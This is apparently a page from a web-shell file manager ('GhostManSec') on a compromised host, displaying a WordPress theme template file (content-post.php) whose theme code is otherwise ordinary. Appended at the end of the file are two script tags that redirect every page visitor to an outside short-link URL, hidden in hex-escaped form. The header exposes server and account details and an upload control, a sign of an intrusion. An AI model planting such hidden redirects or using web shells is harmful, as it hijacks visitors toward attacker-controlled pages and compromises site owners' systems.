GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/parhudrw/alicreates.com/wp-content/themes/essentials/template-parts/content-post.php
<?php
/**
* Template part for displaying posts
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package essentials
*/

$opts = array(
	'layout' 		=> 'default',
	'style' 		=> 'default',
	'content_col' 		=> 10,
	'content_classes' 		=> 'offset-md-1',
	'has_sidebar'	=> false
);
if(!empty(pix_get_option('blog-layout'))){
	$opts['layout'] = pix_get_option('blog-layout');
}
if(!empty(pix_get_option('blog-style'))){
	$opts['style'] = pix_get_option('blog-style');
}


if($opts['layout']!='default'){
	$opts['content_col'] = 7;
	$opts['has_sidebar'] = true;
	$opts['content_classes'] = '';
}
$attr = array(
	'class' => 'rounded-xl shadow'
);




$post_thumb = false;
if(!empty(pix_get_option('post-with-intro'))&&pix_get_option('post-with-intro')){
	$post_thumb = true;
}
if(!empty($_GET["post_intro"])){
	switch ($_GET["post_intro"]) {
		case 'true':
		$post_thumb = true;
		break;
		case 'false':
		$post_thumb = false;
		break;
	}
}
	?>
	<div class="col-12 col-lg-10 offset-lg-1">
		<div id="primary" class="content-area">
			<main id="main" class="site-main">

				<article id="post-<?php the_ID(); ?>" <?php post_class(); ?>>
					<?php
					$attr = array(
						'class' => 'rounded-xl shadow'
					);
					essentials_post_thumbnail('post-thumbnail', $attr);
					?>
				</article>
			</main>
		</div>
	</div>

<div class="col-12 col-md-2 col-lg-1 offset-lg-1 ">
	<div class="pix-my-20 pix-post-meta-box sticky-top pix-sticky-top-adjust" style="top:120px;">
		<?php do_action( 'pix_post_meta_box_start'); ?>
		<?php
		if( function_exists('get_pixfort_likes') ){
			?>
			<div class="bg-white shadow-sm rounded-lg w-100 pix-py-10 pix-mb-10 text-center line-height-1">
				<?php
				echo get_pixfort_likes();
				?>
			</div>
			<?php
		}

		if(comments_open()){
		?>
			<div class="pix-post-meta-comments bg-white shadow-sm rounded-lg w-100 pix-py-10 pix-mb-10 text-center line-height-1">
				<a href="<?php echo esc_url( get_comments_link() ); ?>" class="text-xs text-body-default svg-body-default">
					<span class="pr-1">
						<?php echo pix_load_inline_svg(get_template_directory().'/inc/images/blog/blog-post-comments-icon.svg'); ?>
					</span>
					<span class="align-middle font-weight-bold"><?php echo esc_attr( get_comments_number() ); ?></span>
				</a>
			</div>
		<?php } ?>
		<?php do_action( 'pix_post_meta_box_end'); ?>
	</div>
</div>
<div class="col-12 col-md-8 offset-md-22 ">
	<div class="content-area pix-post-area">
		<main class="site-main post-full-width">
			<article <?php post_class(); ?>>
				<header class="entry-header">
					<?php

					if ( 'post' === get_post_type() ) :

						$author = get_the_author();
						$avatar = get_avatar_url(get_the_author_meta('ID'), array('size'=>80));

						$cat_args = array( 'fields' => 'names' );
						$cat_args = array( 'fields' => 'all' );
						$cats = wp_get_post_categories(get_the_ID(), $cat_args);


						$post_intro = true;
						if(!pix_get_option('post-with-intro')){
							$post_intro = false;
						}
						if(!empty($_GET["post_intro"])){
							switch ($_GET["post_intro"]) {
								case 'true':
								$post_intro = true;
								break;
								case 'false':
								$post_intro = false;
								break;
							}
						}
						if(!$post_intro){
							$text_class = 'text-heading-default';
							$title_sliding = 'pix-sliding-headline';
							if( !empty(pix_get_option('blog-disable-title-animation')) ){
					            if(pix_get_option('blog-disable-title-animation')){
					                $title_sliding = $text_class;
					            }
					        }
							if(!function_exists('essentials_core_plugin')){
								the_title( '<h1 class="pix-post-title h4 pix-mt-10">', '</h1>', true );
							}else{
								the_title( '<h1 class="pix-post-title h4 pix-mt-10 '.$title_sliding.' font-weight-bold" data-class="'.$text_class.'">', '</h1>', true );
							}

						}

						?>

						<div class="entry-meta pix-post-meta-inner d-flex align-items-center pix-my-20">
							<div class="pix-post-meta-author text-heading-default font-weight-bold">
								<a href="<?php echo get_author_posts_url(get_the_author_meta('ID')); ?>" class="pix-post-entry-author text-heading-default font-weight-bold">
									<img class="pix_blog_md_avatar pix-mr-10 shadow" src="<?php echo esc_url($avatar); ?>" alt="<?php echo esc_attr( $author ); ?>">
									<span class="text-sm"><?php echo esc_attr( $author ); ?></span>
								</a>
							</div>
							<div class="flex-fill text-right mr-2">
								<div class="pix-post-meta-badges">
								<?php
								foreach ($cats as $value) {
									$badge_attrs = array(
										'text'	=> $value->name,
										'text_size'	=> 'custom',
										'text_custom_size'		=> '12px',
										'bold'  => 'font-weight-bold',
										'secondary-font'  => 'secondary-font',
										'custom_css'	=> 'padding:5px 10px;line-height:14px;',
										'link'      => get_category_link($value->term_id)
									);
									if(function_exists('sc_pix_badge')){
										echo sc_pix_badge($badge_attrs);
									}else{
										?>
								            <a href="<?php echo esc_url(get_category_link($value->term_id)); ?>">
									    		<span class="d-inline-block mr-1">
									    			<span class="badge bg-primary-light text-primary pix-px-10 pix-py-5" style="margin-right:3px;line-height:14px;">
									    				<span class="" style="font-size:12px;">
									    					<?php echo esc_attr($value->name); ?>
									    				</span>
									    			</span>
									    		</span>
								    		</a>
										<?php
									}

								}
								?>
								</div>
							</div>
							<div class="pix-post-meta-date flex-fill2 text-right text-body-default text-sm">

								<a class="pix-post-entry-date mb-0 d-inline-block text-body-default svg-body-default" href="<?php echo get_permalink(); ?>">
									<span class="pr-1">
										<?php echo pix_load_inline_svg(get_template_directory().'/inc/assets/blog/blog-post-date-icon.svg'); ?>
									</span>
									<span class="text-xs font-weight-bold"><?php echo get_the_date(); ?></span>
								</a>

							</div>
						</div><!-- .entry-meta -->
					<?php endif; ?>
				</header><!-- .entry-header -->

				<div class="entry-content" id="pix-entry-content">
					<?php
					the_content( sprintf(
						wp_kses(
							/* translators: %s: Name of current post. Only visible to screen readers */
							__( 'Continue reading<span class="screen-reader-text"> "%s"</span>', 'essentials' ),
							array(
								'span' => array(
									'class' => array(),
								),
							)
						),
						get_the_title()
						) );

						wp_link_pages( array(
							'before' => '<div class="page-links">' . esc_attr__( 'Pages:', 'essentials' ),
							'after'  => '</div>',
						) );


						if(get_the_tags()){

							if(!empty(get_the_tags())){
								?>
								<div class="clearfix w-100"></div>
								<div class="pix-py-20 pix-post-tags">
									<?php
									foreach (get_the_tags() as $value) {
										?>
										<a href="<?php echo get_tag_link( $value ); ?>" class="btn btn-sm btn-white shadow-sm shadow-hover-sm text-xs2 text-body-default fly-sm pix-mr-10 pix-mb-10 font-weight-bold"><?php echo esc_attr( $value->name ); ?></a>
										<?php
									}
									?>
								</div>
								<?php
							}
						}



						?>
					</div><!-- .entry-content -->
				<?php
					if(!empty(get_the_author_meta( 'description' ))){

				?>
					<footer class="entry-footer d-inline-block w-100">
						<?php


						$show_author_box = true;
						if( !empty(pix_get_option('pix-disable-blog-author-box')) ){
							if(pix_get_option('pix-disable-blog-author-box')){
								$show_author_box = false;
							}
						}
						if($show_author_box){

							if(!empty(get_the_author_meta('first_name'))){
								$author = get_the_author_meta('first_name');
								$author .= ' '. get_the_author_meta('last_name');
							}else{
								$author = get_the_author();
							}



							?>
							<div class="media bg-white rounded-xl shadow-sm pix-p-30 pix-my-20">
								<?php
								$avatar = get_avatar_url(get_the_author_meta('ID'), array('size'=>160));
								if($avatar !== FALSE){
									?>
									<img class="pix_blog_lg_avatar pix-mr-30 shadow" src="<?php echo esc_url($avatar); ?>" alt="<?php echo esc_attr( $author ); ?>">
									<?php
								}
								?>
								<div class="media-body">
									<a class="text-heading-default" href="<?php echo get_author_posts_url(get_the_author_meta('ID')); ?>"><h6 class="mt-0 font-weight-bold text-heading-default"><?php echo esc_attr( $author ); ?></h6></a>
									<?php
									if(!empty(get_the_author_meta( 'job' ))){
										?>
										<div class="mb-0 pix-pt-5 text-sm text-body-default"><?php echo get_the_author_meta( 'job' ); ?></div>
										<?php
									}

									if(!empty(get_the_author_meta('user_url'))){
										$url_txt = get_the_author_meta('user_url');
										if(strpos($url_txt, 'http://') === 0){
											$url_txt = substr($url_txt, strlen('http://'));
										}
										if(strpos($url_txt, 'https://') === 0){
											$url_txt = substr($url_txt, strlen('https://'));
										}
										?>
										<a class="text-sm text-heading-default font-weight-bold" href="<?php echo esc_url ( get_the_author_meta('user_url') ); ?>"><?php echo esc_attr( $url_txt ); ?></a>
										<?php
									}

									?>
									<p class="mb-0 pix-pt-20"><?php the_author_meta( 'description' ); ?></p>
								</div>
							</div>

						<?php } ?>




					</footer><!-- .entry-footer -->
				<?php } ?>

				<?php
					$show_social = true;
					if( !empty(pix_get_option('pix-disable-blog-social')) ){
						if(pix_get_option('pix-disable-blog-social')){
							$show_social = false;
						}
					}
					if($show_social){
						get_pix_social_links();
					}

				?>
				</article><!-- #post-<?php the_ID(); ?> -->

			</main><!-- #main -->
		</div><!-- #primary -->
	</div>


	<?php
	if($opts['has_sidebar']){
		get_sidebar();
	}
	?>

	<!-- Post navigation -->
	<div class="col-12">
		<?php pix_post_navigation(); ?>
	</div>

	<?php
		// Related posts
		get_pix_related_posts();
	?>

	<?php
	// Comments
	if ( comments_open() || get_comments_number() ) :
		?>
		<div class="col-12 col-md-8 offset-md-2 pix-pt-40 pix-pb-80">
			<?php comments_template(); ?>
		</div>
		<?php
	endif;

	?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>